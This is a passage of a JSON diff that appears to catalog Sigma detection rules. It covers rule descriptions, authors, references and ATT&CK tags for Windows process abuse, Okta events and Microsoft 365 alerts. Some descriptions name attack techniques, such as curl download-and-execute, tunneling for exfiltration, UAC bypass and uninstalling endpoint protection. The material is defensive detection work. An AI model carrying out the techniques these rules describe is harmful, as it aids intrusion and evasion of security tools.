Possible preparation for data exfiltration using tunneling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "proc_creation_win_tap_installer_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "99793437-3e16-439b-be0f-078782cf953d", + "value": "Tap Installer Execution" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "value": "UAC Bypass Using NTFS Reparse Point - Process" + }, + { + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_ssh_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "value": "Suspicious SSH Port Forwarding" + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "value": "Application Whitelisting Bypass via PresentationHost.exe" + }, + { + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown", + "Some cases in which the service spawned a werfault.exe process" + ], + "filename": "proc_creation_win_rpcss_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "value": "Remote Procedure Call Service Anomaly" + }, + { + "description": "Detects execution of of Dxcap.exe", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate execution of dxcap.exe by legitimate user" + ], + "filename": "proc_creation_win_lolbin_susp_dxcap.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/harr0ey/status/992008180904419328", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "60f16a96-db70-42eb-8f76-16763e333590", + "value": "Application Whitelisting Bypass via Dxcap.exe" + }, + { + "description": "Conti ransomware command line ioc", + "meta": { + "author": "frack113", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conti_cmd_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.s0575", + "attack.t1486" + ] + }, + "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", + "value": "Conti Ransomware Execution" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate usage of the tool" + ], + "filename": "proc_creation_win_screenconnect.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", + "value": "Use of ScreenConnect Remote Access Software" + }, + { + "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "value": "Suspicious DumpMinitool Usage" + }, + { + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/09/20", + "falsepositive": [ + "Windows installed on non-C drive" + ], + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "value": "Xwizard DLL Sideloading" + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "Uninstall by admin" + ], + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "value": "Uninstall Crowdstrike Falcon" + }, + { + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the system utilities to discover system time for legitimate reason" + ], + "filename": "proc_creation_win_remote_time_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", + "value": "Discovery of a System Time" + }, + { + "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", + "meta": { + "author": "Sreeman, Nasreddine Bencherchali", + "creation_date": "2020/01/13", + "falsepositive": [ + "Administrative scripts (installers)" + ], + "filename": "proc_creation_win_susp_curl_start_combo.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "value": "Curl Start Combination" + }, + { + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_conhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", + "value": "Conhost Parent Process Executions" + }, + { + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". 
\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_deviceenroller_evasion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", + "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "value": "DLL Sideloading via DeviceEnroller.exe" + }, + { + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_radmin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", + "https://www.radmin.fr/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ] + }, + "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "value": "Use Radmin Viewer Utility" + }, + { + "description": "Detects a command used by conti to find volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "value": "Conti Volume Shadow Listing" + }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_parent_combo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation Based on Parent Process" + }, + { + "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely (at.exe deprecated as of Windows 8)" + ], + "filename": "proc_creation_win_interactive_at.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ] + }, + "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "value": "Interactive AT Job" + }, + { + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "value": "Privilege Escalation via Named Pipe Impersonation" + }, + { + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run 
from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "value": "Suspicious Add Scheduled Command Pattern" + }, + { + "description": "Detects when an security threat is detected in Okta.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_security_threat_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", + "value": "Okta Security Threat Detected" + }, + { + "description": "Detects when an user account is locked out.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_user_account_locked_out.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", + "value": "Okta User Account Locked Out" + }, + { + "description": "Detects when a API Token is revoked.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_revoked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", + "value": "Okta API Token Revoked" + }, + { + "description": "Detects when an Policy Rule is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_policy_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", + "value": "Okta Policy Rule Modified or Deleted" + }, + { + "description": "Detects when unauthorized access to app occurs.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "User might of believe that they had access." 
+ ], + "filename": "okta_unauthorized_access_to_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", + "value": "Okta Unauthorized Access to App" + }, + { + "description": "Detects when an application Sign-on Policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", + "value": "Okta Application Sign-On Policy Modified or Deleted" + }, + { + "description": "Detects when an the Administrator role is assigned to an user or group.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Administrator roles could be assigned to users or group by other admin users." 
+ ], + "filename": "okta_admin_role_assigned_to_user_or_group.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "413d4a81-6c98-4479-9863-014785fd579c", + "value": "Okta Admin Role Assigned to an User or Group" + }, + { + "description": "Detects when an application is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", + "value": "Okta Application Modified or Deleted" + }, + { + "description": "Detects when an Network Zone is Deactivated or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_network_zone_deactivated_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + 
}, + "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", + "value": "Okta Network Zone Deactivated or Deleted" + }, + { + "description": "Detects when a API token is created", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", + "value": "Okta API Token Created" + }, + { + "description": "Detects when an attempt at deactivating or resetting MFA.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/21", + "falsepositive": [ + "If a MFA reset or deactivated was performed by a system administrator." 
+ ], + "filename": "okta_mfa_reset_or_deactivated.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", + "value": "Okta MFA Reset or Deactivated" + }, + { + "description": "Detects when an Okta policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Okta Policies being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "okta_policy_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "1667a172-ed4c-463c-9969-efd92195319a", + "value": "Okta Policy Modified or Deleted" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "User using a VPN or Proxy" + ], + "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", + "value": "Activity from Anonymous IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", + "level": "medium", + "logsource.category": "No 
established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", + "value": "Data Exfiltration to Unsanctioned Apps" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_from_susp_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", + "value": "Activity from Suspicious IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_inbox_forwarding.yml", + "level": "low", + 
"logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", + "value": "Suspicious Inbox Forwarding" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_by_terminated_user.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" + ], + "tags": [ 